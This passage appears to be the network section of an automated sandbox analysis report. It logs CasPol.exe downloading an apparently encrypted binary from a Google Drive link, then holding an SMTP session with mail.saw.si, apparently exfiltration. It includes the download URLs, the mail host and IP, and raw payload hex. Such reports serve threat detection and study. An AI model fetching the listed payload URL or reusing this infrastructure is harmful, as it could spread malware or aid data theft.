Sep 7, 2023 09:31:08.500767946 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.500792980 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.500874043 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.503026009 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.503143072 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.503165960 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.503236055 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.505208969 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.505306959 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.506439924 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.506561041 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.506582022 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.506666899 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.508773088 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.508881092 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.508903980 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.508970022 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.510972023 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.511075020 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.511099100 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.511159897 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.513484001 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.513622999 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.513648033 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.513725042 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.515619993 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.515904903 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.515928984 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.516189098 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.517482042 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.517565012 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.517585039 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.517646074 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.519690037 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.519781113 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.519803047 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.519860029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.521846056 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.521950960 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.521986008 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.522042036 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.523933887 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.524025917 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.524046898 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.524066925 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.524097919 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.524136066 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.526079893 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.526168108 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.526191950 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.526273966 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.528085947 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.528163910 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.528187990 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.528258085 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.530324936 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.530419111 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.530441046 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.530503988 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.532371044 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.532449961 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533435106 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.533507109 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533528090 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.533588886 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533678055 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.533737898 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533762932 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.533796072 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533817053 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.533838987 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:12.380614042 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:12.713542938 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:12.713690996 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:13.081233978 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:13.081581116 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:13.414518118 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:13.414828062 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:13.749351978 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:13.754790068 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:14.105694056 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.105760098 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.105808020 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.105844975 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.105859995 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:14.105885983 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.105901003 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:14.131891012 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:14.467921019 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:14.520589113 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:15.984774113 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:16.317764044 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:16.318365097 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:16.652148962 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:16.653163910 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:17.020499945 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:17.021056890 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:17.353950977 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:17.354269981 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:17.728699923 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:17.731060028 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:17.731476068 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:18.064213991 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.064256907 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.065236092 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:18.065345049 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:18.065404892 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:18.065458059 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:31:18.398753881 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.398792028 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.398812056 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.398830891 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.419794083 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:31:18.474044085 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:32:52.082165003 CEST	49760	587	192.168.2.7	212.44.101.105
Sep 7, 2023 09:32:52.417366982 CEST	587	49760	212.44.101.105	192.168.2.7
Sep 7, 2023 09:32:52.418246984 CEST	49760	587	192.168.2.7	212.44.101.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2023 09:31:04.668946981 CEST	57871	53	192.168.2.7	8.8.8.8
Sep 7, 2023 09:31:04.867907047 CEST	53	57871	8.8.8.8	192.168.2.7
Sep 7, 2023 09:31:06.130150080 CEST	63253	53	192.168.2.7	8.8.8.8
Sep 7, 2023 09:31:06.329236984 CEST	53	63253	8.8.8.8	192.168.2.7
Sep 7, 2023 09:31:12.035748959 CEST	55211	53	192.168.2.7	8.8.8.8
Sep 7, 2023 09:31:12.364739895 CEST	53	55211	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 7, 2023 09:31:04.668946981 CEST	192.168.2.7	8.8.8.8	0x53b3	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:06.130150080 CEST	192.168.2.7	8.8.8.8	0xc3cd	Standard query (0)	doc-0o-4k-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:12.035748959 CEST	192.168.2.7	8.8.8.8	0x381a	Standard query (0)	mail.saw.si	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.102	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.138	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.113	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.101	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.139	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:04.867907047 CEST	8.8.8.8	192.168.2.7	0x53b3	No error (0)	drive.google.com		142.251.2.100	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:06.329236984 CEST	8.8.8.8	192.168.2.7	0xc3cd	No error (0)	doc-0o-4k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 7, 2023 09:31:06.329236984 CEST	8.8.8.8	192.168.2.7	0xc3cd	No error (0)	googlehosted.l.googleusercontent.com		142.251.2.132	A (IP address)	IN (0x0001)	false
Sep 7, 2023 09:31:12.364739895 CEST	8.8.8.8	192.168.2.7	0x381a	No error (0)	mail.saw.si		212.44.101.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0o-4k-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49758	142.251.2.102	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-07 07:31:05 UTC	0	OUT	GET /uc?export=download&id=1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: drive.google.com Cache-Control: no-cache
2023-09-07 07:31:06 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 07 Sep 2023 07:31:05 GMT Location: https://doc-0o-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/2krjgeqkqvv0baf5msd218271df8njde/1694071800000/09758452479903950630//1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94?e=download&uuid=cf2baafc-5436-4d0a-9dd6-80a6151c2ee2 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-SAhUpbCntjKIKOfgQLzLbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version= Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49759	142.251.2.132	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-07 07:31:06 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/2krjgeqkqvv0baf5msd218271df8njde/1694071800000/09758452479903950630/*/1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94?e=download&uuid=cf2baafc-5436-4d0a-9dd6-80a6151c2ee2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Cache-Control: no-cache Host: doc-0o-4k-docs.googleusercontent.com Connection: Keep-Alive
2023-09-07 07:31:07 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduifbika_ZQvbwl4Xmn9k64L35uslaUCOB0zUpIdOxAT8enKOJ4bNtVZdC_hQZjtG9TSwD1xPJCgvcQie1H44a3aaqovrUt X-Content-Type-Options: nosniff Content-Type: application/octet-stream Content-Disposition: attachment; filename="oLLmQEbQSy87.bin"; filename=UTF-8''oLLmQEbQSy87.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 385088 Last-Modified: Wed, 06 Sep 2023 06:10:01 GMT Date: Thu, 07 Sep 2023 07:31:07 GMT Expires: Thu, 07 Sep 2023 07:31:07 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ze64UQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-09-07 07:31:07 UTC	6	IN	Data Raw: df e0 a8 ae 04 bf 43 20 ed 20 9a e4 27 81 ba 17 12 b4 b0 03 d4 9e 19 40 35 e4 35 e9 36 4c e6 78 3d 41 e2 20 c8 ad 08 b7 4f ac 87 e2 cf 23 df 96 6e 2a 64 75 88 94 44 57 e2 04 4c 09 5c 45 32 0a f1 f9 f5 cf 49 52 a1 3d 9a 7b 8a 77 0c 6e 79 f0 ed 19 ef 22 46 e4 91 00 fe 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b e4 68 fb 10 d3 bd ae 3c ec ad 8e 28 2a b5 e4 45 f8 e1 5e ee df f9 7a 8d 2a ed cf 29 32 ae 6f 85 7b 8b d7 b6 ff d3 df 95 ae 32 36 e5 31 f0 8b 63 bb a3 2e 13 13 59 09 01 a0 a7 d0 ec b4 bd ae ba b0 04 b7 0e 69 04 4e 2b a2 c4 62 b0 2d 8e 09 29 d8 3f c6 1b ea 76 ea 75 f1 f5 b7 98 ef c4 3a c1 8a 8b d4 cb db 9e 61 ef 71 49 92 4b 38 b9 62 30 59 87 86 db f2 99 41 1f db 4d 00 ae 77 4c 96 49 75 04 fc 13 23 fe f7 fa 01 64 Data Ascii: C '@556Lx=A O#nduDWL\E2IR={wny"F(xmAjvgO)a/D ,E+h<(E^z*)2o{261c.YiN+b-)?vu:aqIK8b0YAMwLIu#d
2023-09-07 07:31:07 UTC	10	IN	Data Raw: 7d fd 8e dd f6 f2 f5 81 b3 8e 44 d7 48 60 ac 6b 67 93 72 21 aa 6f 38 d8 b2 61 1c 20 e5 0e 6c 0a 2a 9a c7 9a 90 34 f9 99 6c 9b 7c 5c b8 39 83 1c 7a 96 50 e6 fc 17 fd 3e 40 36 23 71 cc 6b d8 b5 b4 0b 47 9b d0 5a 37 9c 1e 29 5d 23 aa c3 aa 0b 43 e7 f3 63 c7 9b 19 c0 d2 e4 e2 1d 45 c3 8e ce 3c f8 90 3f a6 9c 95 85 99 73 d9 4e 6a 4f 0c 8b 36 e1 3e 24 db 00 6d b6 e8 fc 53 1c 42 a4 55 95 c4 bb 90 87 ab 26 d4 ab de c8 7e 48 f1 df 26 8e 0d c4 2a 8f 31 fb be ba a3 db df 25 92 26 db ee da 47 e7 4c a8 02 60 3a e2 55 15 dd 0e d1 ca 06 88 60 c0 a1 37 fa b6 42 4c fc 73 f6 30 0c 33 0a 67 23 87 6d ad 83 1e 06 ca f1 b0 d3 97 50 9f d3 c2 e7 4a 75 a6 b5 6b ca 5e fc c0 4a bc e8 3b 65 45 30 01 a2 b4 51 bf 23 ed dd 50 3c 4b 79 c3 6a ab a6 53 73 67 af 29 df d7 89 03 f1 4a 5f c0 Data Ascii: }DH`kgr!o8a l4l\|\9zP>@6#qkGZ7)]#CcE<?sNjO6>$mSBU&~H&1%&GL`:U`7BLs03g#mPJuk^J;eE0Q#P<KyjSsg)J_
2023-09-07 07:31:07 UTC	14	IN	Data Raw: 8a e0 3b 5e 9a dd 5b f3 6e 56 1c fd 32 71 91 ec 6e 39 54 90 db 2b fa bd 0b 4d f5 42 37 31 4c 2d 40 f7 e6 61 93 c4 30 1e 0f 13 cf ab f4 b3 4d ec a5 ba c3 39 f9 45 61 64 65 08 df d9 c6 ab 21 68 05 b2 2b 9d 16 9f f8 e3 5b 6f f9 c1 39 37 99 10 06 20 01 f9 2a 3d a7 98 37 2b b8 60 18 33 cf 5d c5 e6 a4 ce 62 07 d2 e1 65 91 9e 87 11 42 c8 d0 de 00 59 36 fe 7a 7e 86 6f 53 70 0a 35 72 05 25 5d d1 27 63 fb 6a c3 be c0 73 2c d3 bc f3 40 40 fe f5 6d f2 d1 52 80 ab af 13 4b db 1c 16 17 ec 28 d2 53 25 ce ed b6 a6 95 2a 04 bf 38 c4 62 d8 e7 2e cf c7 d9 b3 72 04 e2 a6 73 60 4d ad 6d 33 7f f8 0b 3c 86 32 18 7f 68 1c bb 95 89 96 f3 73 e6 e5 ca 08 8b 33 e4 42 40 d6 56 60 c9 47 46 29 19 ce 76 02 f6 7d ab 27 06 71 cc e6 4d 11 c4 62 86 a5 f4 8e d2 fa f3 d9 dd 38 5e 62 94 00 12 Data Ascii: ;^[nV2qn9T+MB71L-@a0M9Eade!h+[o97 =7+`3]beBY6z~oSp5r%]'cjs,@@mRK(S%8b.rs`Mm3<2hs3B@V`GF)v}'qMb8^b
2023-09-07 07:31:07 UTC	18	IN	Data Raw: da 5b f5 7b 22 64 fd 35 6a 83 17 6b 15 5a 95 b7 29 c8 9d 0f 07 fc 30 37 37 57 26 5e 1e 0b 24 a1 58 33 32 07 3d ba 61 f4 b9 36 f0 d7 bb c7 07 06 5d 6a 64 61 00 0c eb ca ae 2c 92 77 b2 2d 81 3d b8 16 16 11 b9 9a ef 37 37 c2 85 06 20 0d eb 2b 3c a7 9a 10 81 b0 60 1f 2f fc 33 c4 ca aa fb 31 03 f6 9a 10 fe ec 82 31 73 3e 2e 8f 28 3c 2b ec 82 57 ac 61 55 09 d7 46 72 03 4e 17 43 24 65 e4 7a d7 9c f4 4a d0 f7 eb 8d 46 33 88 d5 2b 1d 54 7a a9 c9 ab 09 46 f3 1d 09 19 18 54 8d 5d 23 b9 26 d8 a5 93 45 75 a1 19 f1 5d d5 c9 55 bb d8 c5 49 53 7c 05 4a 5a 93 2f af 6b 5a 25 ff 0b 3a 93 52 60 7f 6f 07 a5 22 8b ba fd 76 8a ae f8 28 8f 79 ed 30 40 d0 4d 67 a6 ae ab 6c 15 52 75 2e fe 53 de 06 07 7b b7 fa 3f 10 c0 5c bd 83 ff 8e d6 fa 94 14 fc 16 75 1f 94 1c 13 53 a4 cd 47 ea Data Ascii: [{"d5jkZ)077W&^$X32=a6]jda,w-=77 +<`/311s>.(<+WaUFrNC$ezJF3+TzFT]#&Eu]UIS\|JZ/kZ%:R`o"v(y0@MglRu.S{?\uSG
2023-09-07 07:31:07 UTC	19	IN	Data Raw: f7 2c 1a ee df e6 e7 cf f7 dc 31 bc 46 f2 d9 44 76 43 d5 e7 da 95 a2 e3 8f 23 80 af 1a fd 38 f8 8e 83 1b 62 59 ae 8f d0 8c c9 61 76 a7 aa 5f ce 98 63 5a 82 3e 98 49 84 37 de 37 72 db f1 c5 3e 61 06 31 0c 10 44 65 40 62 6d c7 18 e5 26 1f 07 6a 56 78 e6 d9 b8 8b 75 4b a9 0a 9b 67 e9 42 ec 15 9c 58 cf d5 aa e5 d4 a2 b3 fc de 6b c7 4b 3e 0a 8d ee 9b 96 9b 6e 7e 17 df 99 47 48 6b da a9 f8 3b c3 2e 14 40 05 04 58 d6 ce 1f 37 a5 3d 98 a6 9a 1b c4 1d 90 01 bc 19 f2 97 78 1c fc 8a a4 51 bb da c3 f0 bb c1 44 90 0f c9 92 6b 38 0d 17 f6 c5 4e ea cb 5a 19 60 19 59 8c 36 2b d9 85 9d 56 0c 14 09 fa 0b 2f 68 7b d9 a6 0a 6e 7c 44 44 ab d7 7d 49 5d 56 bc 01 df 64 4b 01 a8 85 97 f0 59 8b 45 ca 06 d9 bd 67 6c 36 8f 1a 34 1f d9 06 93 6b e8 a1 22 3f f8 25 d3 43 5f 2b e1 44 cc Data Ascii: ,1FDvC#8bYav_cZ>I77r>a1De@bm&jVxuKgBXkK>n~GHk;.@X7=xQDk8NZ`Y6+V/h{n\|DD}I]VdKYEgl64k"?%C_+D
